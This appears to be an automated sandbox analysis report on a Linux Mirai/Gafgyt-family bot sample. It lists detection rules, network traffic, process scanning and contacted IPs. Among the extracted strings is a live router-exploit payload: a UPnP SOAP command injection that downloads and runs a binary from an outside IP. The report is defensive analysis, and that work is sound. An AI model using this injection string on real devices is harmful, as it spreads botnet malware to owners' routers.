            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
            Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39120 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41930
            Source: unknownNetwork traffic detected: HTTP traffic on port 33152 -> 443

            System Summary

            barindex
            Source: yonariVpu7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5446.1.00007fd104001000.00007fd104025000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: yonariVpu7.elf PID: 5446, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: wgetcurl/bin/busyboxechocatnano/proc/proc/%d/cmdline/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-servershellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/POST /goform/set_LimitClient_cfg HTTP/1.1
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: yonariVpu7.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5446.1.00007fd104001000.00007fd104025000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: yonariVpu7.elf PID: 5446, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal100.troj.linELF@0/1025@22/0
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/3760/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/230/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/231/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/232/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/233/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/234/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/236/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/237/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/238/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/239/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/914/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/917/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/11/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/5393/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/12/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/13/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/14/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/15/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/16/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/17/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/19/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/240/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/3095/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/241/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/242/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/3649/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/244/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/245/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/1588/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/246/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/5/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/247/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/248/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/7/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/249/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/129/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/8/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/1906/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/802/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/803/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/22/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/23/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/24/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/25/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/26/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/27/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/28/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/29/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/3420/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/1482/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/490/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/1480/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/250/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/371/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/130/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/251/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/131/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/252/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/132/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/253/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/254/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/1238/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/134/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/255/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/256/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/257/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/378/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/3413/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/258/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/259/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/1475/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/936/cmdlineJump to behavior
            Source: /tmp/yonariVpu7.elf (PID: 5450)File opened: /proc/30/cmdlineJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 55136 -> 37215
            Source: /tmp/yonariVpu7.elf (PID: 5446)Queries kernel information via 'uname': Jump to behavior
            Source: yonariVpu7.elf, 5446.1.00007fff0819a000.00007fff081bb000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/yonariVpu7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/yonariVpu7.elf
            Source: yonariVpu7.elf, 5446.1.00007fff0819a000.00007fff081bb000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
            Source: yonariVpu7.elf, 5446.1.0000560e76e35000.0000560e76eba000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/m68k
            Source: yonariVpu7.elf, 5446.1.0000560e76e35000.0000560e76eba000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/m68k

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: yonariVpu7.elf, type: SAMPLE
            Source: Yara matchFile source: 5446.1.00007fd104001000.00007fd104025000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yonariVpu7.elf PID: 5446, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
            Source: Yara matchFile source: yonariVpu7.elf, type: SAMPLE
            Source: Yara matchFile source: 5446.1.00007fd104001000.00007fd104025000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yonariVpu7.elf PID: 5446, type: MEMORYSTR
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
            Valid Accounts1
            Scripting
            Path InterceptionPath Interception1
            Scripting
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationAbuse Accessibility FeaturesAcquire InfrastructureGather Victim Identity Information
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
            Non-Standard Port
            SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
            Domain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
            Non-Application Layer Protocol
            Data Encrypted for ImpactDNS ServerEmail Addresses
            Local AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureTraffic Duplication5
            Application Layer Protocol
            Data DestructionVirtual Private ServerEmployee Names
            Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeyloggingScheduled Transfer3
            Ingress Tool Transfer
            Data Encrypted for ImpactServerGather Victim Network Information
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1374460 Sample: yonariVpu7.elf Startdate: 14/01/2024 Architecture: LINUX Score: 100 26 haha.skyljne.click 2->26 28 207.98.187.10 WOW-INTERNETUS United States 2->28 30 99 other IPs or domains 2->30 32 Snort IDS alert for network traffic 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus / Scanner detection for submitted sample 2->36 38 4 other signatures 2->38 8 yonariVpu7.elf 2->8         started        10 gnome-session-binary sh gsd-print-notifications 2->10         started        12 gdm3 Default 2->12         started        14 2 other processes 2->14 signatures3 process4 process5 16 yonariVpu7.elf 8->16         started        process6 18 yonariVpu7.elf 16->18         started        20 yonariVpu7.elf 16->20         started        22 yonariVpu7.elf 16->22         started        24 yonariVpu7.elf 16->24         started       
            SourceDetectionScannerLabelLink
            yonariVpu7.elf53%ReversingLabsLinux.Trojan.Mirai
            yonariVpu7.elf55%VirustotalBrowse
            yonariVpu7.elf100%AviraEXP/ELF.Mirai.Gen.Z.A
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://103.245.236.152/skyljne.mips;$0%Avira URL Cloudsafe
            http://103.245.236.152/skyljne.mpsl;0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            haha.skyljne.click
            103.245.236.152
            truetrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://103.245.236.152/skyljne.mips;$yonariVpu7.elffalse
              • Avira URL Cloud: safe
              unknown
              http://103.245.236.152/skyljne.mpsl;yonariVpu7.elffalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/soap/encoding/yonariVpu7.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/yonariVpu7.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  197.240.131.145
                  unknownunknown
                  37705TOPNETTNfalse
                  153.239.164.150
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  106.3.154.200
                  unknownChina
                  4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                  41.242.248.207
                  unknownSouth Africa
                  37105NEOLOGY-ASZAfalse
                  117.32.10.162
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  183.202.74.209
                  unknownChina
                  56042CMNET-SHANXI-APChinaMobilecommunicationscorporationCNfalse
                  120.60.12.16
                  unknownIndia
                  17813MTNL-APMahanagarTelephoneNigamLimitedINfalse
                  69.44.219.33
                  unknownUnited States
                  3356LEVEL3USfalse
                  57.4.201.189
                  unknownBelgium
                  2686ATGS-MMD-ASUSfalse
                  213.138.18.3
                  unknownFrance
                  12684SES-LUX-ASLUfalse
                  197.19.253.195
                  unknownTunisia
                  37693TUNISIANATNfalse
                  191.48.206.201
                  unknownBrazil
                  26615TIMSABRfalse
                  124.135.242.13
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  157.242.55.155
                  unknownUnited States
                  25789LMUUSfalse
                  57.179.76.97
                  unknownBelgium
                  2686ATGS-MMD-ASUSfalse
                  197.66.178.251
                  unknownSouth Africa
                  16637MTNNS-ASZAfalse
                  159.216.239.31
                  unknownNorway
                  2116ASN-CATCHCOMNOfalse
                  223.187.80.168
                  unknownIndia
                  45609BHARTI-MOBILITY-AS-APBhartiAirtelLtdASforGPRSServicefalse
                  157.71.207.89
                  unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
                  207.103.197.172
                  unknownUnited States
                  46800INFOLOGCORPUSfalse
                  75.168.62.154
                  unknownUnited States
                  209CENTURYLINK-US-LEGACY-QWESTUSfalse
                  162.102.236.64
                  unknownUnited States
                  33274ASN-FAIRVIEWHEALTHSERVICESUSfalse
                  122.81.155.172
                  unknownChina
                  45069CNNIC-CTTSDNET-APchinatietongShandongnetCNfalse
                  25.244.245.250
                  unknownUnited Kingdom
                  199055UKCLOUD-ASGBfalse
                  50.180.57.73
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  109.231.29.201
                  unknownPoland
                  34525KOBA-ASPolishISPPLfalse
                  208.142.223.40
                  unknownUnited States
                  3561CENTURYLINK-LEGACY-SAVVISUSfalse
                  157.45.145.206
                  unknownIndia
                  55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
                  62.31.100.80
                  unknownUnited Kingdom
                  5089NTLGBfalse
                  113.200.41.188
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  172.3.47.28
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  202.127.43.226
                  unknownChina
                  4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                  41.108.83.65
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  32.159.153.75
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  104.116.58.226
                  unknownUnited States
                  16625AKAMAI-ASUSfalse
                  197.116.147.36
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  138.196.228.39
                  unknownUnited States
                  21727HAMLINE-EDUUSfalse
                  161.172.49.112
                  unknownUnited States
                  10695WAL-MARTUSfalse
                  84.227.75.60
                  unknownSwitzerland
                  6730SUNRISECHfalse
                  197.149.160.125
                  unknownSouth Africa
                  37438GijimaZAfalse
                  140.107.170.177
                  unknownUnited States
                  14954FHCRCUSfalse
                  118.140.192.92
                  unknownHong Kong
                  9304HUTCHISON-AS-APHGCGlobalCommunicationsLimitedHKfalse
                  41.226.143.25
                  unknownTunisia
                  37705TOPNETTNfalse
                  190.2.254.100
                  unknownArgentina
                  52346DiveoArgentinaARfalse
                  115.234.89.24
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  43.166.243.30
                  unknownJapan4249LILLY-ASUSfalse
                  197.32.129.169
                  unknownEgypt
                  8452TE-ASTE-ASEGfalse
                  199.69.35.3
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  177.128.119.225
                  unknownBrazil
                  28196BANCOVOTORANTIMSABRfalse
                  204.16.133.84
                  unknownUnited States
                  13734BEESKYUSfalse
                  41.82.95.131
                  unknownSenegal
                  8346SONATEL-ASAutonomousSystemEUfalse
                  149.190.218.42
                  unknownUnited Kingdom
                  87INDIANA-ASUSfalse
                  51.75.58.223
                  unknownFrance
                  16276OVHFRfalse
                  84.224.165.103
                  unknownHungary
                  8448PGSM-HUTorokbalintHungaryHUfalse
                  39.75.167.176
                  unknownChina
                  4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                  207.98.187.10
                  unknownUnited States
                  12083WOW-INTERNETUSfalse
                  219.143.78.189
                  unknownChina
                  4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                  210.198.103.204
                  unknownJapan2516KDDIKDDICORPORATIONJPfalse
                  20.217.250.153
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  41.202.62.183
                  unknownSouth Africa
                  25818CMCNETWORKSZAfalse
                  87.67.148.63
                  unknownBelgium
                  5432PROXIMUS-ISP-ASBEfalse
                  157.98.145.228
                  unknownUnited States
                  3527NIH-NETUSfalse
                  110.98.129.206
                  unknownChina
                  9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  170.253.200.120
                  unknownUnited States
                  46687MAXXSOUTH-BROADBANDUSfalse
